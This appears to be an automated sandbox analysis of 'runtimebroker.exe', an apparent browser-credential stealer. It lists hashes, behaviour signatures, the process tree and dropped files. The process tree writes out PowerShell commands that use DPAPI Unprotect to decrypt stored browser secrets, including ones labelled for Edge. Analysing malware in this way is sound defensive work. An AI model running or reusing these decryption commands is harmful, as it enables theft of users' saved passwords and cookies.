Analysis

  • max time kernel
    150s
  • max time network
    149s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240508-en
  • resource tags

    arch:x64, arch:x86, image:win11-20240508-en, locale:en-us, os:windows11-21h2-x64, system
  • submitted
    02/06/2024, 15:27

General

  • Target

    runtimebroker.exe

  • Size

    154.7MB

  • MD5

    75990ee1ed0dd57459df924c28b46700

  • SHA1

    be7d7c518a44b3d73230364fd2064f9e2918f733

  • SHA256

    43ebd800204d360a8ea88eb0d2ed10df9553a910741cd5646ed7d276fd0723a5

  • SHA512

    f1337181f33e6724939859dc5d9fff45242870b36021fb45c737a261f82ed56e594370a24afe87f94a4376e92c0391604714fa2ff80ec000709fc66bc48341e2

  • SSDEEP

    1572864:WQLTsMunuCM2/w9Asn6xzIEhw3JvqzPd24cwT3tIDvvEO/TZidNoyiMhOab0XLHE:WA8g5vu

Score
7/10

Malware Config

Signatures

  • Drops startup file 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials and other sensitive user data.

  • An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 47 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\runtimebroker.exe
    "C:\Users\Admin\AppData\Local\Temp\runtimebroker.exe"
    1⤵
    • Drops startup file
    • Loads dropped DLL
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4968
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4652
      • C:\Windows\system32\tasklist.exe
        tasklist
        3⤵
        • Enumerates processes with tasklist
        • Suspicious use of AdjustPrivilegeToken
        PID:1204
    • C:\Users\Admin\AppData\Local\Temp\runtimebroker.exe
      "C:\Users\Admin\AppData\Local\Temp\runtimebroker.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\runtimebroker" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1652 --field-trial-handle=1804,i,13315901716799113508,4177451301677030067,131072 --disable-features=BlinkSchedulerMicroTaskQueuePerWindowAgent,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
      2⤵
        PID:4856
      • C:\Users\Admin\AppData\Local\Temp\runtimebroker.exe
        "C:\Users\Admin\AppData\Local\Temp\runtimebroker.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\runtimebroker" --mojo-platform-channel-handle=2020 --field-trial-handle=1804,i,13315901716799113508,4177451301677030067,131072 --disable-features=BlinkSchedulerMicroTaskQueuePerWindowAgent,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
        2⤵
          PID:3476
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,123,24,55,191,154,132,233,71,140,73,56,248,204,84,86,192,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,84,247,95,191,127,65,164,7,108,14,99,167,79,145,68,0,23,63,137,200,229,48,25,187,125,154,136,244,216,122,194,233,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,174,133,137,58,194,152,7,254,63,115,138,192,110,39,205,26,84,32,203,77,169,223,134,144,91,87,94,120,158,183,198,139,48,0,0,0,51,240,13,34,140,172,98,245,132,204,94,122,239,21,90,91,7,173,16,206,243,159,155,246,206,122,172,130,69,238,124,72,110,14,65,215,50,99,215,38,127,198,71,209,254,163,67,51,64,0,0,0,226,164,140,243,68,213,186,44,50,107,36,163,86,98,166,208,144,217,29,216,38,197,247,81,229,70,80,89,44,9,59,199,208,128,66,45,196,130,11,45,55,179,64,172,67,212,88,236,137,183,214,204,179,188,80,58,219,144,206,168,13,80,69,252), $null, 'CurrentUser')"
          2⤵
          • An obfuscated cmd.exe command-line is typically used to evade detection.
          • Suspicious use of WriteProcessMemory
          PID:3720
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,123,24,55,191,154,132,233,71,140,73,56,248,204,84,86,192,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,84,247,95,191,127,65,164,7,108,14,99,167,79,145,68,0,23,63,137,200,229,48,25,187,125,154,136,244,216,122,194,233,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,174,133,137,58,194,152,7,254,63,115,138,192,110,39,205,26,84,32,203,77,169,223,134,144,91,87,94,120,158,183,198,139,48,0,0,0,51,240,13,34,140,172,98,245,132,204,94,122,239,21,90,91,7,173,16,206,243,159,155,246,206,122,172,130,69,238,124,72,110,14,65,215,50,99,215,38,127,198,71,209,254,163,67,51,64,0,0,0,226,164,140,243,68,213,186,44,50,107,36,163,86,98,166,208,144,217,29,216,38,197,247,81,229,70,80,89,44,9,59,199,208,128,66,45,196,130,11,45,55,179,64,172,67,212,88,236,137,183,214,204,179,188,80,58,219,144,206,168,13,80,69,252), $null, 'CurrentUser')
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4372
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,123,24,55,191,154,132,233,71,140,73,56,248,204,84,86,192,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,229,245,191,182,116,196,172,135,92,62,208,230,226,209,31,192,16,77,45,177,133,120,6,42,199,39,137,78,15,100,247,138,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,251,41,111,16,231,188,165,60,91,228,157,179,238,156,70,106,241,213,122,44,127,169,183,152,64,186,117,78,212,59,236,110,48,0,0,0,151,38,209,60,169,118,114,250,113,124,112,151,191,43,179,192,208,227,124,17,191,222,27,175,80,52,49,13,80,8,8,222,17,54,104,68,124,92,221,143,249,139,245,124,129,40,175,81,64,0,0,0,197,221,147,19,175,181,29,12,187,158,206,80,101,122,174,32,210,69,234,24,93,61,165,44,50,34,119,140,206,52,102,181,227,5,84,163,173,252,204,86,206,148,14,197,48,91,49,84,240,125,90,8,127,182,78,40,212,33,56,128,92,217,115,226), $null, 'CurrentUser')"
          2⤵
          • An obfuscated cmd.exe command-line is typically used to evade detection.
          • Suspicious use of WriteProcessMemory
          PID:4308
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,123,24,55,191,154,132,233,71,140,73,56,248,204,84,86,192,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,229,245,191,182,116,196,172,135,92,62,208,230,226,209,31,192,16,77,45,177,133,120,6,42,199,39,137,78,15,100,247,138,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,251,41,111,16,231,188,165,60,91,228,157,179,238,156,70,106,241,213,122,44,127,169,183,152,64,186,117,78,212,59,236,110,48,0,0,0,151,38,209,60,169,118,114,250,113,124,112,151,191,43,179,192,208,227,124,17,191,222,27,175,80,52,49,13,80,8,8,222,17,54,104,68,124,92,221,143,249,139,245,124,129,40,175,81,64,0,0,0,197,221,147,19,175,181,29,12,187,158,206,80,101,122,174,32,210,69,234,24,93,61,165,44,50,34,119,140,206,52,102,181,227,5,84,163,173,252,204,86,206,148,14,197,48,91,49,84,240,125,90,8,127,182,78,40,212,33,56,128,92,217,115,226), $null, 'CurrentUser')
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3548
        • C:\Users\Admin\AppData\Local\Temp\runtimebroker.exe
          "C:\Users\Admin\AppData\Local\Temp\runtimebroker.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --user-data-dir="C:\Users\Admin\AppData\Roaming\runtimebroker" --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1336 --field-trial-handle=1804,i,13315901716799113508,4177451301677030067,131072 --disable-features=BlinkSchedulerMicroTaskQueuePerWindowAgent,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:1396

      Network

            MITRE ATT&CK Enterprise v15

            Downloads

            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

              Filesize

              3KB

              MD5

              f69f145ee494b2d67c5d50108c862d4a

              SHA1

              68f36b9bd553beb2a7eec5f4a8fef317703c77e1

              SHA256

              06dd71fdfda7e319131bf98bd21dc6bee9a480736ab688e52bafe10074f00fc7

              SHA512

              302489f1e2676d83cf9cf92d378176a230f15975af12e2a2a50d9c057f4de0fc2c22f68a9390f5b337eaa10ea77366a1a79e71808de1e7a7c4e6432aeb75c530

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              1KB

              MD5

              0cb10f06f4bd19bfda39ddabbeb66be7

              SHA1

              fa4dbe8d73f76669fcae8b456a59b55bbc75c66f

              SHA256

              93083452e49af786b11cec45977aec8924ea4312ffba4a1d3c6d8c679b4acb50

              SHA512

              c838f84af0ef903d954cf0d33c87830bb53452405c1ef8f9af2625125bafdf4fed1151ec5e5901a6ad0fcd963b9b31bb3173fc5c246a53a75af9501abf316b22

            • C:\Users\Admin\AppData\Local\Temp\00ead14d-7e54-4b24-93ed-811972e8a387.tmp.node

              Filesize

              1.6MB

              MD5

              aa8da32ebca307d4f99cf2da290afd22

              SHA1

              8590c0b54987ad6b0bc15a1aa66b9d2ca65ca899

              SHA256

              ed3a86d32e83849720e150c18c4d19c90cabe912d674624f34051c19936167db

              SHA512

              d7809a39922d99a716744e6cc17e4094930c40a8a21c983830c3570c4e52846151d66ad5d6021bc2a5b5fd29f520465b7b88f71cb86c30e0fadc4d0fb21ee1d7

            • C:\Users\Admin\AppData\Local\Temp\92739948-3847-406c-8710-566a0e463b12.tmp.node

              Filesize

              137KB

              MD5

              04bfbfec8db966420fe4c7b85ebb506a

              SHA1

              939bb742a354a92e1dcd3661a62d69e48030a335

              SHA256

              da2172ce055fa47d6a0ea1c90654f530abed33f69a74d52fab06c4c7653b48fd

              SHA512

              4ea97a9a120ed5bee8638e0a69561c2159fc3769062d7102167b0e92b4f1a5c002a761bd104282425f6cee8d0e39dbe7e12ad4e4a38570c3f90f31b65072dd65

            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jjx1jily.fqm.ps1

              Filesize

              60B

              MD5

              d17fe0a3f47be24a6453e9ef58c94641

              SHA1

              6ab83620379fc69f80c0242105ddffd7d98d5d9d

              SHA256

              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

              SHA512

              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

            • C:\Users\Admin\AppData\Local\Temp\xx_lol\Browser.zip

              Filesize

              22B

              MD5

              76cdb2bad9582d23c1f6f4d868218d6c

              SHA1

              b04f3ee8f5e43fa3b162981b50bb72fe1acabb33

              SHA256

              8739c76e681f900923b900c9df0ef75cf421d39cabb54650c4b9ad19b6a76d85

              SHA512

              5e2f959f36b66df0580a94f384c5fc1ceeec4b2a3925f062d7b68f21758b86581ac2adcfdde73a171a28496e758ef1b23ca4951c05455cdae9357cc3b5a5825f

            • memory/1396-60-0x000001CF72500000-0x000001CF72501000-memory.dmp

              Filesize

              4KB

            • memory/1396-53-0x000001CF72500000-0x000001CF72501000-memory.dmp

              Filesize

              4KB

            • memory/1396-52-0x000001CF72500000-0x000001CF72501000-memory.dmp

              Filesize

              4KB

            • memory/1396-51-0x000001CF72500000-0x000001CF72501000-memory.dmp

              Filesize

              4KB

            • memory/1396-58-0x000001CF72500000-0x000001CF72501000-memory.dmp

              Filesize

              4KB

            • memory/1396-63-0x000001CF72500000-0x000001CF72501000-memory.dmp

              Filesize

              4KB

            • memory/1396-62-0x000001CF72500000-0x000001CF72501000-memory.dmp

              Filesize

              4KB

            • memory/1396-61-0x000001CF72500000-0x000001CF72501000-memory.dmp

              Filesize

              4KB

            • memory/1396-59-0x000001CF72500000-0x000001CF72501000-memory.dmp

              Filesize

              4KB

            • memory/1396-57-0x000001CF72500000-0x000001CF72501000-memory.dmp

              Filesize

              4KB

            • memory/4372-20-0x000001B756180000-0x000001B7561D0000-memory.dmp

              Filesize

              320KB

            • memory/4372-16-0x000001B73DAB0000-0x000001B73DAD2000-memory.dmp

              Filesize

              136KB